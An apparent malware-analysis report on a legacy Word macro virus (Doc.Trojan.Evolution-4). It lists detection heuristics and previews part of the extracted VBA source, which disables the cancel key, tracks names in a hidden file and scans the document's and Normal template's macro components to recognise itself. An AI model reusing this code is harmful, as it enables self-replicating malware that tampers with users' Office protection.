MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file exhibits characteristics of legacy macro viruses and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code automatically. ClamAV detections further confirm its malicious nature, classifying it as Doc.Trojan.Evolution-4. The extensive size of the VBA macro source suggests a complex payload, likely designed for execution upon document interaction.
Heuristics 6
-
ClamAV: Doc.Trojan.Evolution-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Evolution-4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 700408 bytes |
SHA-256: 82cddaf3b28b90f0c09cc732e8c9aa572c01ae882648280b5100f59bc6678c73 |
|||
|
Detection
ClamAV:
Doc.Trojan.Evolution-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FHCITRCD"
'2319651
'A
'10:43:11
'HOME
'12-13-1999
'17:19:55
'Ditry PC
'Pima County Library
'12-13-1999
'A
'12-13-1999
'11-19-1999
'DP
'17:19:55
'10:43:11
Public Source As String
'10:43:11
'17:19:55
'Ditry PC
'Home Office 97
'DP
'11-22-1999
'10:43:11
'11-10-1999
'12-13-1999
'3444285
'10:43:11
'HOME
'8522026
'A
'2450732
Public ByeMacro As String
'Ditry PC
'11-22-1999
'10:43:11
'Home Office 97
'5990278
'8253791
'12-13-1999
'PCL
'Ditry PC
'7991627
'Ditry PC
'HOME
'3454443
'17:19:55
'10:43:11
Public Hostinf As Boolean
'6117274
'Avert
'12-13-1999
'Home Office 97
'795698
'17:19:55
'DP
'Pima County Library
'12-13-1999
'A
'12-13-1999
'18:53:43
'Ditry PC
'6856834
'2295135
Public FileInf As Boolean
'3302932
'Avert
'DP
'7716587
'DP
'17:19:55
'12-13-1999
'PCL
'12-13-1999
'A
'Ditry PC
'HOME
'12-13-1999
'A
'10:43:11
Public FExport As String
'767097
'11-22-1999
'Ditry PC
'18:53:43
'12-13-1999
'17:19:55
'12-13-1999
'4215783
'10:43:11
'5459878
'12-13-1999
'2780085
'12-13-1999
'A
'Ditry PC
Public PMExport As String
'10:43:11
'17:19:55
'3044854
'Home Office 97
'8497511
'Avert
'Ditry PC
'5350576
'DP
'9130505
'DP
'HOME
'12-13-1999
'11-22-1999
'6219754
Public PMFile_Yes As Boolean
'8624507
'11-22-1999
'10:43:11
'11-19-1999
'1778979
'11-22-1999
'12-13-1999
'7755328
'10:43:11
'912536
'Ditry PC
'Home Office 97
'8751503
'1920333
'DP
Public Ex_Yes As Boolean
'10:43:11
'A
'10:43:11
'Home Office 97
'DP
'A
'12-13-1999
'13:12:27
'Ditry PC
'11-22-1999
'DP
'18:53:43
'10:43:11
'11-22-1999
'DP
Public Filename As String
'12-13-1999
'11-22-1999
'12-13-1999
'18:53:43
'10:43:11
'9519665
'DP
'Pima County Library
'Ditry PC
'A
'DP
'HOME
'DP
'17:19:55
'9632303
Public FileID As String
'Ditry PC
'Avert
'10:43:11
'Home Office 97
'10:43:11
'5332882
'10:43:11
'Pima County Library
'10:43:11
'Avert
'12-13-1999
'Home Office 97
'12-13-1999
'6598756
'Ditry PC
Public FileID2 As String
'3688006
'Avert
'12-13-1999
'18:53:43
'10:43:11
'17:19:55
'10:43:11
'11-10-1999
'10:43:11
'1662255
'Ditry PC
'HOME
'4953880
'7114912
'7231637
Public Virname As String
'Ditry PC
'11-22-1999
'Ditry PC
'18:53:43
'DP
'17:19:55
'Ditry PC
'13:12:27
'10:43:11
'17:19:55
'DP
'11-19-1999
'DP
'11-22-1999
'Ditry PC
Public FC_There As Boolean
'10:43:11
'A
'12-13-1999
'Home Office 97
'12-13-1999
'11-22-1999
'10:43:11
'13:12:27
'DP
'7241908
'2037057
'HOME
'3171850
'Avert
'5576602
Public FO_There As Boolean
'DP
'396380
'Ditry PC
'11-19-1999
'10:43:11
'5722042
'Ditry PC
'7882324
'DP
'Avert
'10:43:11
'18:53:43
'5703598
'A
'DP
Public FP_There As Boolean
'3429928
'11-22-1999
'12-13-1999
'Home Office 97
'Ditry PC
'A
'DP
'PCL
'DP
'17:19:55
'1025175
'11-19-1999
'10:43:11
'Avert
'Ditry PC
Public FN_There As Boolean
'7358633
'A
'10:43:11
'HOME
'DP
'3059211
'12-13-1999
'5608654
'Ditry PC
'A
'12-13-1999
'5442916
'DP
'17:19:55
'10:43:11
Public FS_There As Boolean
'10:43:11
'17:19:55
'10:43:11
'7974664
'DP
'11-22-1999
'Ditry PC
'11-10-1999
'10:43:11
'2051415
'10:43:11
'HOME
'640101
'17:19:55
'10:43:11
Public FSA_There As Boolean
'DP
'11-22-1999
'10:43:11
'HOME
'10:43:11
'17:19:55
'10:43:11
'11-10-1999
'1905975
'A
'12-13-1999
'HOME
'12-13-1999
'8249705
'DP
Public VrusName As String
'10:43:11
'Avert
'9501222
'Home Office 97
'10:43:11
'Avert
'DP
'Pima County Library
'5834680
'7217393
'10:43:11
'18:53:43
'Ditry PC
'9622146
'Ditry PC
Public Armor As Boolean
'1156257
'17:19:55
'Ditry PC
'18:53:43
'7485629
'A
'17378
'PCL
'DP
'Avert
'8235347
'6577708
'10:43:11
'17:19:55
'10:43:11
Function Source_Check()
'3298846
'17:19:55
'12-13-1999
'379418
'2422131
'A
'12-13-1999
'3203901
'12-13-1999
'9749142
'Ditry PC
'Home Office 97
'DP
'A
'DP
On Error Resume Next
'12-13-1999
'Avert
'12-13-1999
'HOME
'Ditry PC
'17:19:55
'DP
'11-10-1999
'Ditry PC
'Avert
'4310728
'18:53:43
'9890381
'11-22-1999
'Ditry PC
Application.EnableCancelKey = wdCancelDisabled
'10:43:11
'A
'Ditry PC
'11-19-1999
'3561010
'A
'4695802
'11-10-1999
'7100555
'11-22-1999
'10:43:11
'5180752
'DP
'A
'Ditry PC
If MacroContainer = NormalTemplate Then Source = "Host": Exit Function
'DP
'6078515
'10:43:11
'Home Office 97
'DP
'11-22-1999
'7227551
'9537359
'DP
'A
'Ditry PC
'6446626
'DP
'888021
'Ditry PC
If MacroContainer = ActiveDocument Then Source = "File"
'12-13-1999
'17:19:55
'9763385
'11-19-1999
'12-13-1999
'629943
'1029261
'13:12:27
'12-13-1999
'Avert
'Ditry PC
'Home Office 97
'6092758
'6959315
'DP
End Function
'10:43:11
'9491064
'8108351
'HOME
'DP
'A
'4437724
'2200190
'6969473
'11-22-1999
'DP
'11-19-1999
'12-13-1999
'A
'4826884
Function Self_Recognition()
'DP
'4685644
'12-13-1999
'HOME
'12-13-1999
'11-22-1999
'10:43:11
'Pima County Library
'9374225
'8094107
'10:43:11
'HOME
'10:43:11
'1895817
'DP
On Error Resume Next
'DP
'Avert
'8239433
'Home Office 97
'10:43:11
'11-22-1999
'DP
'11-10-1999
'2032971
'17:19:55
'Ditry PC
'HOME
'10:43:11
'A
'6842477
Application.EnableCancelKey = wdCancelDisabled
'DP
'11-22-1999
'10:43:11
'HOME
'Ditry PC
'11-22-1999
'513105
'PCL
'12-13-1999
'11-22-1999
'12-13-1999
'Home Office 97
'Ditry PC
'Avert
'2295135
Open "C:\windows\system\vnames.cpl" For Input As #1
'3302932
'4554562
'DP
'8748898
'DP
'Avert
'12-13-1999
'1188308
'12-13-1999
'Avert
'Ditry PC
'1153652
'12-13-1999
'9364068
'10:43:11
Do
'767097
'17:19:55
'Ditry PC
'18:53:43
'12-13-1999
'A
'12-13-1999
'PCL
'10:43:11
'17:19:55
'12-13-1999
'11-19-1999
'12-13-1999
'11-22-1999
'Ditry PC
Line Input #1, Virname
'10:43:11
'5435363
'3044854
'Home Office 97
'8497511
'7967111
'Ditry PC
'2327186
'DP
'A
'DP
'11-19-1999
'12-13-1999
'2280891
'6219754
For Z = 1 To ActiveDocument.VBProject.VBComponents.Count
'8624507
'Avert
'10:43:11
'18:53:43
'1778979
'7086311
'12-13-1999
'13:12:27
'10:43:11
'11-22-1999
'Ditry PC
'18:53:43
'8751503
'6701237
'DP
If ActiveDocument.VBProject.VBComponents(Z).Name <> "ThisDocument" Then
'10:43:11
'9359982
'10:43:11
'1280648
'DP
'3288688
'12-13-1999
'PCL
'Ditry PC
'Avert
'Ditry PC
'HOME
'12-13-1999
'11-22-1999
'Ditry PC
If Virname = ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo lost
'DP
'6828233
'DP
'HOME
'12-13-1999
'11-22-1999
'Ditry PC
'11-10-1999
'2241685
'3030610
'Ditry PC
'18:53:43
'10:43:11
'Avert
'Ditry PC
If Virname <> ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo newname
'5912312
'5566445
'12-13-1999
'HOME
'12-13-1999
'A
'12-13-1999
'13:12:27
'10:43:11
'A
'DP
'11-19-1999
'8702139
'Avert
'DP
newname:
'DP
'17:19:55
'3511646
'Home Office 97
'12-13-1999
'A
'6301472
'13:12:27
'DP
'Avert
'10:43:11
'HOME
'Ditry PC
'17:19:55
'2114689
Close #1
'Ditry PC
'11-22-1999
'3380564
'18:53:43
'Ditry PC
'A
'Ditry PC
'PCL
'8444061
'3292774
'DP
'HOME
'DP
'4300570
'12-13-1999
Open "C:\windows\system\vnames.cpl" For Append As #1
'Ditry PC
'5562359
'10:43:11
'11-19-1999
'12-13-1999
'11-22-1999
'10:43:11
'2454182
'12-13-1999
'17:19:55
'10:43:11
'11-19-1999
'6170390
'Avert
'7178187
Print #1, ActiveDocument.VBProject.VBComponents(Z).Name
'2503849
'17:19:55
'12-13-1999
'HOME
'10:43:11
'17:19:55
'12-13-1999
'PCL
'Ditry PC
'17:19:55
'10:43:11
'HOME
'Ditry PC
'A
'DP
Close #1
'9841017
'11-22-1999
'Ditry PC
'Home Office 97
'10:43:11
'11-22-1999
'10:43:11
'11-10-1999
'12-13-1999
'17:19:55
'8833221
'HOME
'10:43:11
'17:19:55
'12-13-1999
End If
'Ditry PC
'A
'DP
'2157363
'5031512
'11-22-1999
'Ditry PC
'13:12:27
'12-13-1999
'A
'12-13-1999
'HOME
'12-13-1999
'Avert
'Ditry PC
If ActiveDocument.VBProject.VBComponents(Z).Name = "ThisDocument" Then GoTo lost
'4646438
'A
'12-13-1999
'HOME
'10:43:11
'Avert
'12-13-1999
'Pima County Library
'12-13-1999
'Avert
'Ditry PC
'4586631
'12-13-1999
'A
'12-13-1999
lost:
'12-13-1999
'2153895
'10:43:11
'HOME
'12-13-1999
'Avert
'DP
'11-10-1999
'10:43:11
'Avert
'Ditry PC
'5725509
'12-13-1999
'Avert
'10:43:11
Next Z
'Ditry PC
'Avert
'12-13-1999
'18:53:43
'Ditry PC
'Avert
'10:43:11
'PCL
'12-13-1999
'11-22-1999
'12-13-1999
'18:53:43
'848815
'9232986
'10:43:11
Loop Until EOF(1)
'DP
'A
'7436265
'11-19-1999
'DP
'11-22-1999
'Ditry PC
'PCL
'975811
'4296484
'10:43:11
'18:53:43
'Ditry PC
'Avert
'12-13-1999
Close #1
'12-13-1999
'Avert
'Ditry PC
'18:53:43
'Ditry PC
'11-22-1999
'DP
'11-10-1999
'10:43:11
'17:19:55
'DP
'HOME
'DP
'11-22-1999
'DP
Dim Lib
'1106893
'A
'Ditry PC
'HOME
'DP
'17:19:55
'DP
'PCL
'4904516
'Avert
'5785316
'9523132
'9968013
'11-22-1999
'DP
Open "C:\windows\system\vnames.cpl" For Input As #1
'6043394
'17:19:55
'99096
'11-19-1999
'10:43:11
'Avert
'10:43:11
'PCL
'10:43:11
'11-22-1999
'10:43:11
'18:53:43
'Ditry PC
'17:19:55
'12-13-1999
Do
'Ditry PC
'A
'6039308
'Home Office 97
'12-13-1999
'Avert
'Ditry PC
'11-10-1999
'10:43:11
'Avert
'10:43:11
'11-19-1999
'Ditry PC
'11-22-1999
'7305183
Line Input #1, Virname
'9582939
'A
'10:43:11
'HOME
'Ditry PC
'Avert
'DP
'Pima County Library
'10:43:11
'A
'Ditry PC
'HOME
'DP
'4558648
'1233889
For Lib = 1 To NormalTemplate.VBProject.VBComponents.Count
'10:43:11
'5693441
'Ditry PC
'11-19-1999
'4519442
'8098193
'8575143
'PCL
'10:43:11
'17:19:55
'12-13-1999
'HOME
'10:43:11
'Avert
'12-13-1999
If NormalTemplate.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo skip
'Ditry PC
'Avert
'DP
'HOME
'10:43:11
'11-22-1999
'10:43:11
'3593061
'Ditry PC
'17:19:55
'DP
'11-19-1999
'DP
'17:19:55
'12-13-1999
If NormalTemplate.VBProject.VBComponents(Lib).Name = Virname Then Hostinf = True: GoTo doccheck
'10:43:11
'8225189
'4777520
'1411730
'12-13-1999
'A
'Ditry PC
'Pima County Library
'Ditry PC
'5951519
'10:43:11
'6991383
'12-13-1999
'11-22-1999
'12-13-1999
skip:
'Ditry PC
'11-22-1999
'10:43:11
'Home Office 97
'Ditry PC
'Avert
'9709936
'3334983
'10:43:11
'A
'2372767
'6733305
'12-13-1999
'3546766
'7051191
Next Lib
'DP
'11-22-1999
'DP
'Home Office 97
'DP
'11-22-1999
'2499763
'13:12:27
'10:43:11
'A
'10:43:11
'3062678
'12-13-1999
'7090397
'Ditry PC
Loop Until EOF(1)
'Ditry PC
'A
'DP
'5594427
'DP
'11-22-1999
'6297386
'11-10-1999
'12-13-1999
'9105990
'10:43:11
'HOME
'Ditry PC
'Avert
'8317065
doccheck:
'DP
'17:19:55
'12-13-1999
'11-19-1999
'DP
'17:19:55
'DP
'PCL
'7309269
'17:19:55
'10:43:11
'HOME
'3765638
'A
'Ditry PC
Close #1
'3507560
'Avert
'Ditry PC
'789008
'DP
'Avert
'10:43:11
'11-10-1999
'DP
'Avert
'10:43:11
'11-19-1999
'10:43:11
'3161692
'12-13-1999
Open "C:\windows\system\vnames.cpl" For Input As #1
'10:43:11
'11-22-1999
'DP
'HOME
'DP
'17:19:55
'12-13-1999
'6899043
'5035598
'17:19:55
'4773434
'11-19-1999
'12-13-1999
'17:19:55
'12-13-1999
Do
'Ditry PC
'17:19:55
'DP
'11-19-1999
'3638642
'4427566
'12-13-1999
'Pima County Library
'Ditry PC
'11-22-1999
'DP
'Home Office 97
'DP
'A
'12-13-1999
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.